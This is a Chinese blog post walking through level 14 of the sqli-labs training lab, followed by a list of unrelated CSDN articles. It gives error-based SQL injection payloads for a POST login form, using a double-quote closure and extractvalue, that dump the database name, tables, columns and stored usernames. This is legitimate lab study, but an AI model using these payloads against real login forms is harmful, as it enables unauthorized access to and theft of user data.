6.24 sqllab第14 关

最新推荐文章于 2024-08-06 15:20:26 发布
最新推荐文章于 2024-08-06 15:20:26 发布
阅读量70 收藏
点赞数
文章标签: 数据库 数学建模
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ailkli/article/details/131364334
版权

目录

判断注入类型

解题方式一:使用报错函数floor:

显示数据库

显示数据表:

显示表下字段:

显示字段具体值:

判断注入类型

用户密码随便输入不正确的

 输入正确的用户名和密码

 两者显示信息不同

抓包进行尝试闭合方式和注释方式

 和正确的页面响应相同,说明注释和闭合方式正确

解题方式一:使用报错函数floor:

显示数据库

uname=admin&passwd=-admin" or extractvalue(1,concat(0x7e,(select database()),0x7e)) --+&submit=Submit

 

显示数据表:

uname=admin&passwd=-admin" or extractvalue(1,concat(0x7e,(select (table_name)from
information_schema.tables where table_schema=database() limit 2,1),0x7e)) --+&submit=Submit

 

显示表下字段:

uname=admin&passwd=-admin" or extractvalue(1,concat(0x7e,(select (column_name)from
information_schema.columns where table_name='users' limit 1,1),0x7e))  --+&submit=Submit

显示字段具体值:

uname=admin&passwd=-admin" or  extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))  --+&submit=Submit 

 

ailkli
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第十四
yuqnqi的博客
05-09 251
由于extractvalue()函数能够查询的字符串长度最大是32个字符,所以需要用substr()函数进行字符串截取,分段把表中的数据拿到。上面从1开始,截取30个字段。于是这次就从31开始,同样是截取30个字符。分段把users表中用户名和密码数据拿到。所以字段数为2,且页面无回显。还是用burp吧,看着方便。
6.24sqllab 第13
ailkli的博客
06-24 118
布尔盲注。
6.24 sqllab靶场 12
ailkli的博客
06-24 84
解题思路:使用burp抓包对post处进行注入,或者使用hackbar post参数进行注入。先输入用户名和密码进去,发现用户名和密码是使用POST的方式传上去。经过测试发现是字符型") --+型注入。
6.24
zjc0201的博客
06-24 183
noip模擬    T1開始寫了個n方的暴力,後來畫圖發現每次改變都是在上一次基礎上的,然後比較最小那個值。那麼就可以用單調隊列來存,這樣就能保證第一個必為最小,然後每個值都要改就可以直接把比較標準改掉,這樣只要改一次就可以了,效率提高到了o(n),應該是可以A的。    T2求最短路還要是k的倍數,圖還保證是dag,看到數據範圍比價小,就想到直接記錄到每個點的完系最短路,再top一邊求最短路,後...
WinRAR 6.24-64x无广告弹窗版
NIEmi2333的博客
12-18 478
WinRAR 6.24-64x无广告弹窗版
6.24作业
superZ1352582106的博客
06-24 194
bin/bash。
日记 6.24
2402_85865867的博客
06-24 104
今天下午踢🦶了场球赛,先发制人进了一球。明天加油💪('ω'💪)
6.24 ARM
weixin_45735759的博客
06-24 115
work 6.24
m0_60026178的博客
06-24 462
④软链接文件,如果源文件被删除,链接会断开,软链接文件会失效,如果重新创建一个同名的源文件,软链接文件会重新链接,并且链接到新创建的文件。find 查找的路径 -name 文件名 ----->在指定路径下,以文件名为条件查找文件。find -name 文件名 ----->在当前路径下,查找文件。sudo dpkg -L 软件名------>查看软件的安装路径。sudo dpkg -l 软件名------>查看安装列表。sudo dpkg -r 软件名 ----->不完全卸载。
java笔记 mybatis 基本增删改
qq_63095129的博客
08-05 531
在pom.xml文件中添加依赖。
04、MySQL-DCL(数据控制语言)
最新发布
nibabaoo的博客
08-06 201
例:创建用户zhangsan 只能够在当前主机localhost访问 密码123456。例:创建用户xiaoming 可以在任意主机访问该数据库 密码123456。例:修改用户zhangsan的密码为654321。例:删除用户xiaoming。
用 Bytebase 实现批量、多环境、多租户数据库的丝滑变更
Bytebase的博客
08-02 1138
现在,你已学会如何使用部署配置和数据库分组在 Bytebase 中运行批量更改。动手试试吧!💡 更多资讯,请注 Bytebase 公号:Bytebase。
MySQL备份与恢复
m0_74860678的博客
08-01 641
在生产环境中,数据的安全性至重要任何数据的丢失都可能产生严重的后果造成数据丢失的原因程序错误人为操作错误运算错误磁盘故障灾难(如火灾、地震)和盗窃# 开启二进制日志功能[mysqld]# 重启服务# 有 mysql-bin.000001 就代表成功。
MHA高可用配置及故障切换
m0_70627741的博客
08-02 1470
HMA(MasterHigh Availablity)是一套优秀的Mysql高可用环境下的故障切换和主从复制的软件解决MySLQ单点的问题MySQL故障切换过程中,MHA能做到0-30秒内自动完成故障切换操作。故障切换的过程中最大程度上保证数据的一致性,以达到真正意义上的高可用。MHA是建在主从复制的基础上的;0-30秒自动完成故障切换是MHA的特性。
使用MySQLdump定时备份数据库实战
ithongchou的博客
08-03 92
手动执行脚本文件,并查看结果,检验脚本没有问题,因为脚本第一行已经指定脚本执行器,所以这里执行不需要使用。工具来设置定时任务。以下是一个简单的例子,展示如何每天凌晨。然后,你需要设置一个cron任务来定时执行这个脚本。确定系统定时任务已经开始,查看系统定时任务是否已经开启。上编辑的脚本格式在·Linux·平台不兼容问题。首先,你需要创建一个备份脚本。进行数据库的定时备份,你可以使用。保存这个脚本到一个文件,比如。
实战:MySQL数据同步神器之Canal
为无为,事无事,味无味。
08-02 1064
canal [kə'næl],译意为水道/管道/沟渠,主要用途是基于 MySQL 数据库增量日志解析,提供增量数据订阅和消费。项目起源于阿里巴巴内部对于跨机房数据同步的需求,通过解析MySQL的二进制日志(Binary Log),Canal能够捕获并推送数据库的变更事件,满足了诸如数据库镜像、实时备份、索引实时维护等多种业务场景的需求。GitHub - alibaba/canal: 阿里巴巴 MySQL binlog 增量订阅&消费组件。
大数据-61 Kafka 高级特性 消息消费02-主题与分区 自定义反序列化 拦截器 位移提交 位移管理 重平衡
永远好奇,无限进步!
08-02 1071
上节我们完成了消费组测试、消费组心跳机制、相配置参数等内容。本节研究Kafka高级特性的 主题与分区 自定义反序列 拦截器 位移提交 重平衡 如何避免重平衡等概念问题。重平衡可以说是Kafka中诟病最厉害的一部分。 重平衡是一个协议,它规定了如何让消费者组下的所有消费者来分配Topic中每一个分区。要完全避免重平衡做不到,但是要尽量避免重平衡。 在分布式系统中,由于网络问题没有接收到心跳,此时不确认是挂了还是负载没过来还是网络阻塞。
Switchover和Failover切换方案(实战)
一个只求实际的程序猿
08-02 795
-检查主库下switchover_status字段,如果值为"session active"或者"to standby", 则主数据库角色可以切换为备库角色。=======================检查=================================--两个节点各执行2次。2.--备库切换为主库(切换可在1节点执行,启停需所有集群节点都执行)3.--主库切换为备库(切换1节点执行,启停需所有集群节点都执行)4.--获取主、备库上的信息以及保护模式(主备库执行)
接口测试学习笔记1
weixin_53666393的博客
08-03 899
同时也像白盒测试那样,检查程序的代码,但这种检查不像白盒测试那样详细、完整,一般只对程序模块之间的调用、核心代码进行检查,在集成测试时经常采用,一般也是程序员大量采用。现在企业说的接口测试,一般指的是Web接口测试或Http接口测试,主要指的是基于B/S架构的接口测试(B/S架构主要基于HTTP 超文本传输协议,所以也叫HTTP接口测试)对请求对象(网页、文件、图片...)进行的操作,就是一些命令,程序员在编程的时候使用,在接口文档中会指明,测试人员测试接口的时候,按照说明选择正确的方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值